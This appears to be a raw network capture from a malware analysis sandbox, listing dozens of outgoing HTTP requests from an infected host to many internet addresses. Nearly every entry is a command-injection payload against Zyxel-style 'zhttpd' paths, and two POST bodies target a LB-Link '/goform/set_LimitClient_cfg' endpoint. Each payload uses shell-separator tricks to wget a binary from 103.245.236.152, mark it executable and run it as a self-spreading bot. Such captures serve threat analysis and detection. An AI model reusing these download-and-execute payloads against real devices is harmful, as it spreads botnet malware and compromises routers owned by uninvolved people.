                                            Jan 14, 2024 15:50:48.614800930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6901192.168.2.23407565.192.47.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614831924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6902192.168.2.2343968145.84.218.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614867926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6903192.168.2.2352010196.44.121.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614917994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6904192.168.2.2336524169.131.211.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.614949942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6905192.168.2.235147073.243.115.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.615001917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6906192.168.2.2343670186.221.73.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.615005016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6907192.168.2.235773047.6.107.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.615020037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6908192.168.2.2356810216.232.49.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.615063906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6909192.168.2.2360260180.165.163.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.615098000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6910192.168.2.2352942168.71.216.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.615132093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6911192.168.2.2334594132.182.203.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.617862940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6912192.168.2.2342020112.181.128.1478080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:48.981661081 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                            Jan 14, 2024 15:50:49.269176960 CET103INHTTP/1.1 404 Not Found
                                            Content-Type: text/plain
                                            Content-Length: 30
                                            Connection: close


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6913192.168.2.2345362164.52.220.238080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.075409889 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                            Jan 14, 2024 15:50:49.450099945 CET185INHTTP/1.1 400 Bad Request
                                            Content-Type: text/html;charset=iso-8859-1
                                            Content-Length: 50
                                            Connection: close
                                            Server: Jetty(10.0.17)
                                            Data Raw: 3c 68 31 3e 42 61 64 20 4d 65 73 73 61 67 65 20 34 30 30 3c 2f 68 31 3e 3c 70 72 65 3e 72 65 61 73 6f 6e 3a 20 4e 6f 20 48 6f 73 74 3c 2f 70 72 65 3e
                                            Data Ascii: <h1>Bad Message 400</h1><pre>reason: No Host</pre>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6914192.168.2.235695647.254.175.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624142885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6915192.168.2.2353542188.204.60.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624155998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6916192.168.2.2356092218.115.229.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624191046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6917192.168.2.2356338213.205.143.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624221087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6918192.168.2.2339022113.213.4.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624222994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6919192.168.2.2334416131.140.151.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624253988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6920192.168.2.234585669.33.104.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624316931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6921192.168.2.235449631.114.93.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624320030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6922192.168.2.2343494108.57.101.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624346972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6923192.168.2.235296873.46.181.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624376059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6924192.168.2.233786688.181.191.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624387980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6925192.168.2.234447625.26.182.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624408960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6926192.168.2.2335598204.72.157.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624439001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6927192.168.2.2344944141.177.201.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624470949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6928192.168.2.233504272.9.48.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624492884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6929192.168.2.2343514105.213.178.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624514103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6930192.168.2.2352184118.25.102.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624538898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6931192.168.2.233653439.134.150.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624593019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6932192.168.2.2350654199.28.252.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624594927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6933192.168.2.2357570161.51.129.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624620914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6934192.168.2.2343786123.211.231.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624641895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6935192.168.2.2360566162.98.109.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624676943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6936192.168.2.2332894205.226.162.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624680996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6937192.168.2.2334956119.56.211.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624737024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6938192.168.2.2353172168.128.198.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624749899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6939192.168.2.233700614.119.236.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624783993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6940192.168.2.236004066.33.116.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624802113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6941192.168.2.234958648.139.235.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624834061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6942192.168.2.2360958136.95.210.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624859095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6943192.168.2.2337180151.40.167.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624906063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6944192.168.2.234647881.117.0.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624908924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6945192.168.2.2350578206.173.56.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624922037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6946192.168.2.2338146166.96.151.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624963999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6947192.168.2.2334944193.25.21.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.624985933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6948192.168.2.2338954116.251.42.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625010967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6949192.168.2.233347266.105.240.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625046968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6950192.168.2.2337158221.97.191.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625067949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6951192.168.2.2338104187.193.18.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625099897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6952192.168.2.235554845.199.134.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625122070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6953192.168.2.234256020.75.31.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625154018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6954192.168.2.233802223.92.78.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625180960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6955192.168.2.2348510184.109.222.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625200033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6956192.168.2.2352524221.131.214.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625235081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6957192.168.2.2337654124.148.215.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.625264883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6958192.168.2.2342388149.25.21.130443
                                            TimestampBytes transferredDirectionData
